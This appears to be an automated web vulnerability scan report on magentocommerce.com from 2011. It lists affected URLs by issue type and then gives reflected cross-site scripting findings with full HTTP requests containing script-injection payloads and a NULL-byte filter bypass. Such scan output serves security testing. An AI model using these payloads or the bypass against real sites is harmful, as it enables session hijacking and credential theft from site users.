4.148. http://www.magentocommerce.com/support/magento_core_api

4.149. http://www.magentocommerce.com/support/overview

4.150. http://www.magentocommerce.com/svn

4.151. http://www.magentocommerce.com/system-requirements

4.152. http://www.magentocommerce.com/trackback/2509/

4.153. http://www.magentocommerce.com/trackback/2555/

4.154. http://www.magentocommerce.com/trackback/2556/

4.155. http://www.magentocommerce.com/trackback/2557/

4.156. http://www.magentocommerce.com/trackback/2571/

4.157. http://www.magentocommerce.com/trackback/323/

4.158. http://www.magentocommerce.com/trackback/383/

4.159. http://www.magentocommerce.com/trackback/446/

4.160. http://www.magentocommerce.com/trackback/561/

4.161. http://www.magentocommerce.com/trackback/625/

4.162. http://www.magentocommerce.com/trackback/713/

4.163. http://www.magentocommerce.com/trackback/892/

4.164. http://www.magentocommerce.com/translations

4.165. http://www.magentocommerce.com/ua

4.166. http://www.magentocommerce.com/vi

4.167. http://www.magentocommerce.com/virtual/download-magento/

4.168. http://www.magentocommerce.com/virtual/enterprise-register/

4.169. http://www.magentocommerce.com/whitepaper/

4.170. http://www.magentocommerce.com/wiki

5. Password field with autocomplete enabled

5.1. http://www.magentocommerce.com/

5.2. http://www.magentocommerce.com/!!!--

5.3. http://www.magentocommerce.com/answers/

5.4. http://www.magentocommerce.com/blog

5.5. http://www.magentocommerce.com/blog/comments/ebay-agrees-to-acquire-magento/

5.6. http://www.magentocommerce.com/blog/comments/magento-wins-best-new-open-source-project/

5.7. http://www.magentocommerce.com/blog/comments/magento-wins-best-of-open-source-enterprise-applications/

5.8. http://www.magentocommerce.com/boards/

5.9. http://www.magentocommerce.com/boards/viewforum/10252/

5.10. http://www.magentocommerce.com/boards/viewthread/1647/

5.11. http://www.magentocommerce.com/bug-tracking

5.12. http://www.magentocommerce.com/casestudies

5.13. http://www.magentocommerce.com/company/

5.14. http://www.magentocommerce.com/company/careers

5.15. http://www.magentocommerce.com/company/contact-us

5.16. http://www.magentocommerce.com/company/contact-us/

5.17. http://www.magentocommerce.com/company/contact-us/thank_you

5.18. http://www.magentocommerce.com/company/events

5.19. http://www.magentocommerce.com/company/events/

5.20. http://www.magentocommerce.com/company/inthepress

5.21. http://www.magentocommerce.com/company/inthepress/

5.22. http://www.magentocommerce.com/company/jobs/

5.23. http://www.magentocommerce.com/company/leadership

5.24. http://www.magentocommerce.com/company/leadership/

5.25. http://www.magentocommerce.com/company/media

5.26. http://www.magentocommerce.com/company/media/

5.27. http://www.magentocommerce.com/company/pci-compliance

5.28. http://www.magentocommerce.com/company/press-releases

5.29. http://www.magentocommerce.com/company/press-releases/

5.30. http://www.magentocommerce.com/company/privacy

5.31. http://www.magentocommerce.com/company/terms

5.32. http://www.magentocommerce.com/de

5.33. http://www.magentocommerce.com/demo

5.34. http://www.magentocommerce.com/design_guide

5.35. http://www.magentocommerce.com/dk

5.36. http://www.magentocommerce.com/download

5.37. http://www.magentocommerce.com/download/diff

5.38. http://www.magentocommerce.com/download/login_form

5.39. http://www.magentocommerce.com/download/release_notes

5.40. http://www.magentocommerce.com/es

5.41. http://www.magentocommerce.com/fr

5.42. http://www.magentocommerce.com/he

5.43. http://www.magentocommerce.com/hu

5.44. http://www.magentocommerce.com/imagine

5.45. http://www.magentocommerce.com/it

5.46. http://www.magentocommerce.com/jobs

5.47. http://www.magentocommerce.com/jobs/

5.48. http://www.magentocommerce.com/jobs/p/2/

5.49. http://www.magentocommerce.com/knowledge-base

5.50. http://www.magentocommerce.com/license/

5.51. http://www.magentocommerce.com/license/enterprise-edition

5.52. http://www.magentocommerce.com/lodger-footwear/

5.53. http://www.magentocommerce.com/lt

5.54. http://www.magentocommerce.com/magento-connect

5.55. http://www.magentocommerce.com/maps/online

5.56. http://www.magentocommerce.com/media/interviews

5.57. http://www.magentocommerce.com/media/interviews/alpedia/view

5.58. http://www.magentocommerce.com/media/interviews/bright-light-media/view

5.59. http://www.magentocommerce.com/media/interviews/buettenpapierfabrik-gmund/view

5.60. http://www.magentocommerce.com/media/interviews/jack-wolfskin/view

5.61. http://www.magentocommerce.com/media/interviews/liaison-dangereuse/view

5.62. http://www.magentocommerce.com/media/interviews/lodger-footwear/view

5.63. http://www.magentocommerce.com/media/interviews/man-junk/view

5.64. http://www.magentocommerce.com/media/interviews/nerdyshirts/view

5.65. http://www.magentocommerce.com/media/interviews/quadra-informatique-and-anneau-du-rhin-society/view

5.66. http://www.magentocommerce.com/media/interviews/sbs-broadcasting/view

5.67. http://www.magentocommerce.com/media/interviews/shoebacca/view

5.68. http://www.magentocommerce.com/media/interviews/signing-time/view

5.69. http://www.magentocommerce.com/media/interviews/stella-lena-ny/view

5.70. http://www.magentocommerce.com/media/interviews/timeout-online/view

5.71. http://www.magentocommerce.com/media/interviews/tvonics/view

5.72. http://www.magentocommerce.com/media/interviews/wander/view

5.73. http://www.magentocommerce.com/media/interviews/wearport/view

5.74. http://www.magentocommerce.com/media/interviews/wkf-communications/view

5.75. http://www.magentocommerce.com/media/screencasts

5.76. http://www.magentocommerce.com/media/screencasts/adding-related-products/view

5.77. http://www.magentocommerce.com/media/screencasts/community-groups/view

5.78. http://www.magentocommerce.com/media/screencasts/configurable-products/view

5.79. http://www.magentocommerce.com/media/screencasts/configuring-tier-pricing/view

5.80. http://www.magentocommerce.com/media/screencasts/content-staging-and-merging/view

5.81. http://www.magentocommerce.com/media/screencasts/currency/view

5.82. http://www.magentocommerce.com/media/screencasts/data-exporting/view

5.83. http://www.magentocommerce.com/media/screencasts/designers-guide-1/view

5.84. http://www.magentocommerce.com/media/screencasts/gift-certificates-cards/view

5.85. http://www.magentocommerce.com/media/screencasts/grouped-products/view

5.86. http://www.magentocommerce.com/media/screencasts/introducing-the-magento-enterprise-edition/view

5.87. http://www.magentocommerce.com/media/screencasts/landing-pages/view

5.88. http://www.magentocommerce.com/media/screencasts/permissions/view

5.89. http://www.magentocommerce.com/media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view

5.90. http://www.magentocommerce.com/media/screencasts/product-comparison/view

5.91. http://www.magentocommerce.com/media/screencasts/search/view

5.92. http://www.magentocommerce.com/media/screencasts/single-page-checkout-guest-checkout/view

5.93. http://www.magentocommerce.com/media/screencasts/static-blocks/view

5.94. http://www.magentocommerce.com/media/screencasts/transactional-email/view

5.95. http://www.magentocommerce.com/media/screencasts/upsells/view

5.96. http://www.magentocommerce.com/media/screencasts/working-with-paypal/view

5.97. http://www.magentocommerce.com/media/screenshots

5.98. http://www.magentocommerce.com/media/videos

5.99. http://www.magentocommerce.com/media/videos/

5.100. http://www.magentocommerce.com/media/webinars

5.101. http://www.magentocommerce.com/media/webinars/

5.102. http://www.magentocommerce.com/partners/

5.103. http://www.magentocommerce.com/partners/find/bronze-solution/

5.104. http://www.magentocommerce.com/partners/find/hosting-partners/

5.105. http://www.magentocommerce.com/partners/find/industry-partners/

5.106. http://www.magentocommerce.com/partners/find/solution-partners/

5.107. http://www.magentocommerce.com/partners/hosting-partners

5.108. http://www.magentocommerce.com/partners/industry-partners

5.109. http://www.magentocommerce.com/partners/solution-partners

5.110. http://www.magentocommerce.com/partners/view/117/gorilla

5.111. http://www.magentocommerce.com/pl

5.112. http://www.magentocommerce.com/product/community-edition

5.113. http://www.magentocommerce.com/product/compare

5.114. http://www.magentocommerce.com/product/deployed-solutions

5.115. http://www.magentocommerce.com/product/emerging-business

5.116. http://www.magentocommerce.com/product/enterprise-community-faqs

5.117. http://www.magentocommerce.com/product/enterprise-edition

5.118. http://www.magentocommerce.com/product/enterprise-level

5.119. http://www.magentocommerce.com/product/faq

5.120. http://www.magentocommerce.com/product/features

5.121. http://www.magentocommerce.com/product/hosted-solutions

5.122. http://www.magentocommerce.com/product/magento-go

5.123. http://www.magentocommerce.com/product/magento-zend

5.124. http://www.magentocommerce.com/product/mobile

5.125. http://www.magentocommerce.com/product/professional-edition

5.126. http://www.magentocommerce.com/products/checkout/cart/

5.127. http://www.magentocommerce.com/products/job-post.html

5.128. http://www.magentocommerce.com/pt_BR

5.129. http://www.magentocommerce.com/roadmap/issue-roadmap

5.130. http://www.magentocommerce.com/ru

5.131. http://www.magentocommerce.com/services

5.132. http://www.magentocommerce.com/services/

5.133. http://www.magentocommerce.com/services/course-pricing

5.134. http://www.magentocommerce.com/services/course-schedule

5.135. http://www.magentocommerce.com/services/descriptions

5.136. http://www.magentocommerce.com/services/professional-services

5.137. http://www.magentocommerce.com/services/register-for-training

5.138. http://www.magentocommerce.com/services/testimonials

5.139. http://www.magentocommerce.com/services/training

5.140. http://www.magentocommerce.com/showcase

5.141. http://www.magentocommerce.com/sitemap/

5.142. http://www.magentocommerce.com/support/magento-user-guide-book

5.143. http://www.magentocommerce.com/support/magento_core_api

5.144. http://www.magentocommerce.com/support/overview

5.145. http://www.magentocommerce.com/svn

5.146. http://www.magentocommerce.com/system-requirements

5.147. http://www.magentocommerce.com/translations

5.148. http://www.magentocommerce.com/ua

5.149. http://www.magentocommerce.com/vi

5.150. http://www.magentocommerce.com/virtual/download-magento/

5.151. http://www.magentocommerce.com/virtual/enterprise-register/

5.152. http://www.magentocommerce.com/whitepaper/

6. Cross-domain POST

6.1. http://www.magentocommerce.com/

6.2. http://www.magentocommerce.com/!!!--

6.3. http://www.magentocommerce.com/answers/

6.4. http://www.magentocommerce.com/blog

6.5. http://www.magentocommerce.com/blog

6.6. http://www.magentocommerce.com/blog/comments/ebay-agrees-to-acquire-magento/

6.7. http://www.magentocommerce.com/blog/comments/magento-wins-best-new-open-source-project/

6.8. http://www.magentocommerce.com/blog/comments/magento-wins-best-of-open-source-enterprise-applications/

6.9. http://www.magentocommerce.com/boards/

6.10. http://www.magentocommerce.com/boards/viewforum/10252/

6.11. http://www.magentocommerce.com/boards/viewthread/1647/

6.12. http://www.magentocommerce.com/bug-tracking

6.13. http://www.magentocommerce.com/company/

6.14. http://www.magentocommerce.com/company/careers

6.15. http://www.magentocommerce.com/company/contact-us

6.16. http://www.magentocommerce.com/company/contact-us

6.17. http://www.magentocommerce.com/company/contact-us/

6.18. http://www.magentocommerce.com/company/contact-us/

6.19. http://www.magentocommerce.com/company/contact-us/thank_you

6.20. http://www.magentocommerce.com/company/events

6.21. http://www.magentocommerce.com/company/events/

6.22. http://www.magentocommerce.com/company/inthepress

6.23. http://www.magentocommerce.com/company/inthepress/

6.24. http://www.magentocommerce.com/company/jobs/

6.25. http://www.magentocommerce.com/company/leadership

6.26. http://www.magentocommerce.com/company/leadership/

6.27. http://www.magentocommerce.com/company/media

6.28. http://www.magentocommerce.com/company/media/

6.29. http://www.magentocommerce.com/company/pci-compliance

6.30. http://www.magentocommerce.com/company/press-releases

6.31. http://www.magentocommerce.com/company/press-releases/

6.32. http://www.magentocommerce.com/company/privacy

6.33. http://www.magentocommerce.com/company/terms

6.34. http://www.magentocommerce.com/de

6.35. http://www.magentocommerce.com/demo

6.36. http://www.magentocommerce.com/design_guide

6.37. http://www.magentocommerce.com/dk

6.38. http://www.magentocommerce.com/download

6.39. http://www.magentocommerce.com/download/diff

6.40. http://www.magentocommerce.com/download/release_notes

6.41. http://www.magentocommerce.com/es

6.42. http://www.magentocommerce.com/fr

6.43. http://www.magentocommerce.com/he

6.44. http://www.magentocommerce.com/hu

6.45. http://www.magentocommerce.com/imagine

6.46. http://www.magentocommerce.com/it

6.47. http://www.magentocommerce.com/jobs

6.48. http://www.magentocommerce.com/jobs/

6.49. http://www.magentocommerce.com/jobs/p/2/

6.50. http://www.magentocommerce.com/knowledge-base

6.51. http://www.magentocommerce.com/license/

6.52. http://www.magentocommerce.com/license/enterprise-edition

6.53. http://www.magentocommerce.com/lodger-footwear/

6.54. http://www.magentocommerce.com/lt

6.55. http://www.magentocommerce.com/magento-connect

6.56. http://www.magentocommerce.com/magento-connect

6.57. http://www.magentocommerce.com/maps/online

6.58. http://www.magentocommerce.com/media/interviews

6.59. http://www.magentocommerce.com/media/interviews/alpedia/view

6.60. http://www.magentocommerce.com/media/interviews/bright-light-media/view

6.61. http://www.magentocommerce.com/media/interviews/buettenpapierfabrik-gmund/view

6.62. http://www.magentocommerce.com/media/interviews/jack-wolfskin/view

6.63. http://www.magentocommerce.com/media/interviews/liaison-dangereuse/view

6.64. http://www.magentocommerce.com/media/interviews/lodger-footwear/view

6.65. http://www.magentocommerce.com/media/interviews/man-junk/view

6.66. http://www.magentocommerce.com/media/interviews/nerdyshirts/view

6.67. http://www.magentocommerce.com/media/interviews/quadra-informatique-and-anneau-du-rhin-society/view

6.68. http://www.magentocommerce.com/media/interviews/sbs-broadcasting/view

6.69. http://www.magentocommerce.com/media/interviews/shoebacca/view

6.70. http://www.magentocommerce.com/media/interviews/signing-time/view

6.71. http://www.magentocommerce.com/media/interviews/stella-lena-ny/view

6.72. http://www.magentocommerce.com/media/interviews/timeout-online/view

6.73. http://www.magentocommerce.com/media/interviews/tvonics/view

6.74. http://www.magentocommerce.com/media/interviews/wander/view

6.75. http://www.magentocommerce.com/media/interviews/wearport/view

6.76. http://www.magentocommerce.com/media/interviews/wkf-communications/view

6.77. http://www.magentocommerce.com/media/screencasts

6.78. http://www.magentocommerce.com/media/screencasts/adding-related-products/view

6.79. http://www.magentocommerce.com/media/screencasts/community-groups/view

6.80. http://www.magentocommerce.com/media/screencasts/configurable-products/view

6.81. http://www.magentocommerce.com/media/screencasts/configuring-tier-pricing/view

6.82. http://www.magentocommerce.com/media/screencasts/content-staging-and-merging/view

6.83. http://www.magentocommerce.com/media/screencasts/currency/view

6.84. http://www.magentocommerce.com/media/screencasts/data-exporting/view

6.85. http://www.magentocommerce.com/media/screencasts/designers-guide-1/view

6.86. http://www.magentocommerce.com/media/screencasts/gift-certificates-cards/view

6.87. http://www.magentocommerce.com/media/screencasts/grouped-products/view

6.88. http://www.magentocommerce.com/media/screencasts/introducing-the-magento-enterprise-edition/view

6.89. http://www.magentocommerce.com/media/screencasts/landing-pages/view

6.90. http://www.magentocommerce.com/media/screencasts/permissions/view

6.91. http://www.magentocommerce.com/media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view

6.92. http://www.magentocommerce.com/media/screencasts/product-comparison/view

6.93. http://www.magentocommerce.com/media/screencasts/search/view

6.94. http://www.magentocommerce.com/media/screencasts/single-page-checkout-guest-checkout/view

6.95. http://www.magentocommerce.com/media/screencasts/static-blocks/view

6.96. http://www.magentocommerce.com/media/screencasts/transactional-email/view

6.97. http://www.magentocommerce.com/media/screencasts/upsells/view

6.98. http://www.magentocommerce.com/media/screencasts/working-with-paypal/view

6.99. http://www.magentocommerce.com/media/screenshots

6.100. http://www.magentocommerce.com/media/videos

6.101. http://www.magentocommerce.com/media/videos/

6.102. http://www.magentocommerce.com/media/webinars

6.103. http://www.magentocommerce.com/media/webinars/

6.104. http://www.magentocommerce.com/partners/

6.105. http://www.magentocommerce.com/partners/find/bronze-solution/

6.106. http://www.magentocommerce.com/partners/find/hosting-partners/

6.107. http://www.magentocommerce.com/partners/find/industry-partners/

6.108. http://www.magentocommerce.com/partners/find/solution-partners/

6.109. http://www.magentocommerce.com/partners/hosting-partners

6.110. http://www.magentocommerce.com/partners/industry-partners

6.111. http://www.magentocommerce.com/partners/solution-partners

6.112. http://www.magentocommerce.com/partners/view/117/gorilla

6.113. http://www.magentocommerce.com/pl

6.114. http://www.magentocommerce.com/product/community-edition

6.115. http://www.magentocommerce.com/product/compare

6.116. http://www.magentocommerce.com/product/deployed-solutions

6.117. http://www.magentocommerce.com/product/emerging-business

6.118. http://www.magentocommerce.com/product/enterprise-community-faqs

6.119. http://www.magentocommerce.com/product/enterprise-edition

6.120. http://www.magentocommerce.com/product/enterprise-level

6.121. http://www.magentocommerce.com/product/faq

6.122. http://www.magentocommerce.com/product/features

6.123. http://www.magentocommerce.com/product/hosted-solutions

6.124. http://www.magentocommerce.com/product/magento-go

6.125. http://www.magentocommerce.com/product/magento-zend

6.126. http://www.magentocommerce.com/product/mobile

6.127. http://www.magentocommerce.com/product/professional-edition

6.128. http://www.magentocommerce.com/products/checkout/cart/

6.129. http://www.magentocommerce.com/products/job-post.html

6.130. http://www.magentocommerce.com/products/skin/frontend/enterprise/mc/js/scripts.js

6.131. http://www.magentocommerce.com/pt_BR

6.132. http://www.magentocommerce.com/roadmap/issue-roadmap

6.133. http://www.magentocommerce.com/ru

6.134. http://www.magentocommerce.com/services

6.135. http://www.magentocommerce.com/services/

6.136. http://www.magentocommerce.com/services/contact-us-popup

6.137. http://www.magentocommerce.com/services/course-pricing

6.138. http://www.magentocommerce.com/services/course-schedule

6.139. http://www.magentocommerce.com/services/descriptions

6.140. http://www.magentocommerce.com/services/professional-services

6.141. http://www.magentocommerce.com/services/register-for-training

6.142. http://www.magentocommerce.com/services/testimonials

6.143. http://www.magentocommerce.com/services/training

6.144. http://www.magentocommerce.com/showcase

6.145. http://www.magentocommerce.com/sitemap/

6.146. http://www.magentocommerce.com/support/magento-user-guide-book

6.147. http://www.magentocommerce.com/support/magento_core_api

6.148. http://www.magentocommerce.com/support/overview

6.149. http://www.magentocommerce.com/svn

6.150. http://www.magentocommerce.com/system-requirements

6.151. http://www.magentocommerce.com/translations

6.152. http://www.magentocommerce.com/ua

6.153. http://www.magentocommerce.com/vi

6.154. http://www.magentocommerce.com/virtual/download-magento/

6.155. http://www.magentocommerce.com/virtual/enterprise-register/

6.156. http://www.magentocommerce.com/whitepaper/

7. Cross-domain script include

7.1. http://www.magentocommerce.com/blog

7.2. http://www.magentocommerce.com/blog/comments/ebay-agrees-to-acquire-magento/

7.3. http://www.magentocommerce.com/blog/comments/magento-wins-best-new-open-source-project/

7.4. http://www.magentocommerce.com/blog/comments/magento-wins-best-of-open-source-enterprise-applications/

7.5. http://www.magentocommerce.com/download

7.6. http://www.magentocommerce.com/magento-connect

7.7. http://www.magentocommerce.com/maps/online

7.8. http://www.magentocommerce.com/services/contact-us-popup

8. Email addresses disclosed

8.1. http://www.magentocommerce.com/boards/

8.2. http://www.magentocommerce.com/company/careers

8.3. http://www.magentocommerce.com/company/jobs/

8.4. http://www.magentocommerce.com/company/media

8.5. http://www.magentocommerce.com/company/media/

8.6. http://www.magentocommerce.com/company/privacy

8.7. http://www.magentocommerce.com/de

8.8. http://www.magentocommerce.com/es

8.9. http://www.magentocommerce.com/fr

8.10. http://www.magentocommerce.com/it

8.11. http://www.magentocommerce.com/js/rating.js

8.12. http://www.magentocommerce.com/js/tracklinks.js

8.13. http://www.magentocommerce.com/pl

8.14. http://www.magentocommerce.com/products/js/mage/cookies.js

8.15. http://www.magentocommerce.com/products/js/mage/translate.js

8.16. http://www.magentocommerce.com/products/js/scriptaculous/controls.js

8.17. http://www.magentocommerce.com/products/js/scriptaculous/dragdrop.js

8.18. http://www.magentocommerce.com/products/js/varien/form.js

8.19. http://www.magentocommerce.com/products/js/varien/js.js

8.20. http://www.magentocommerce.com/products/skin/frontend/enterprise/mc/css/print.css

8.21. http://www.magentocommerce.com/products/skin/frontend/enterprise/mc/css/styles.css

8.22. http://www.magentocommerce.com/products/skin/frontend/enterprise/mc/css/widgets.css

8.23. http://www.magentocommerce.com/products/skin/frontend/enterprise/mc/js/enterprise/catalogevent.js

8.24. http://www.magentocommerce.com/products/skin/frontend/enterprise/mc/js/scripts.js

8.25. http://www.magentocommerce.com/ru

8.26. http://www.magentocommerce.com/ua

9. Social security numbers disclosed

10. Credit card numbers disclosed

11. Robots.txt file

12. HTML does not specify charset

12.1. http://www.magentocommerce.com/images/avatars/uploads/avatar_19608.png

12.2. http://www.magentocommerce.com/img/btn_submit.gif

12.3. http://www.magentocommerce.com/img/icon_post_comment.gif

12.4. http://www.magentocommerce.com/img/magento_dnld_rr.gif

13. Content type incorrectly stated



1. Cross-site scripting (reflected)
There are 54 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.magentocommerce.com/answers/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /answers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005e56c"><script>alert(1)</script>abbcd2c92b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5e56c"><script>alert(1)</script>abbcd2c92b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /answers/?%005e56c"><script>alert(1)</script>abbcd2c92b6=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:35 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1313176414; expires=Sat, 11-Aug-2012 15:13:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: Answers=deleted; expires=Thu, 12-Aug-2010 15:13:34 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=deleted; expires=Thu, 12-Aug-2010 15:13:34 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=-1-1313334815%7C311b13ed5fdebae6aafa387d0b84b492%7C1313162015%7C-1%7C1313334815; expires=Fri, 12-Aug-2011 19:13:35 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers-Volatile=-1-1313334815%7C311b13ed5fdebae6aafa387d0b84b492%7C1313162015%7C-1%7C1313334815; expires=Fri, 12-Aug-2011 19:13:35 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=-1-1313334815%7C311b13ed5fdebae6aafa387d0b84b492%7C1313162015%7C-1%7C1313334815; expires=Fri, 12-Aug-2011 19:13:35 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers-Volatile=-1-1313334815%7C311b13ed5fdebae6aafa387d0b84b492%7C1313162015%7C-1%7C1313334815; expires=Fri, 12-Aug-2011 19:13:35 GMT; path=/; domain=www.magentocommerce.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-Garden-Version: Vanilla 2.0.17.9
Last-Modified: Fri, 12 Aug 2011 15:13:35 GMT
Content-Length: 54295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-ca">
<head>
   <title>Magento Answer
...[SNIP]...
<input type="hidden" name="login[back_url]" value="/answers/?%005e56c"><script>alert(1)</script>abbcd2c92b6=1">
...[SNIP]...

1.2. http://www.magentocommerce.com/boards/viewforum/10252/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/viewforum/10252/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f656"><script>alert(1)</script>687b2c4ddbf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boards/viewforum/102523f656"><script>alert(1)</script>687b2c4ddbf/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176573; expires=Sat, 11-Aug-2012 15:16:13 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:13 GMT
Content-Length: 34546

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/boards/viewforum/102523f656"><script>alert(1)</script>687b2c4ddbf" />
...[SNIP]...

1.3. http://www.magentocommerce.com/media/screencasts/adding-related-products/view [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/adding-related-products/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1a42"><script>alert(1)</script>cfcde977640 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/adding-related-productsc1a42"><script>alert(1)</script>cfcde977640/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176237; expires=Sat, 11-Aug-2012 15:10:37 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:37 GMT
Content-Length: 33506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/adding-related-productsc1a42"><script>alert(1)</script>cfcde977640/view">
...[SNIP]...

1.4. http://www.magentocommerce.com/media/screencasts/adding-related-products/view [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/adding-related-products/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002f335"><script>alert(1)</script>878d14e3ada was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2f335"><script>alert(1)</script>878d14e3ada in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/adding-related-products/view?%002f335"><script>alert(1)</script>878d14e3ada=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176164; expires=Sat, 11-Aug-2012 15:09:24 GMT; path=/; domain=magentocommerce.com
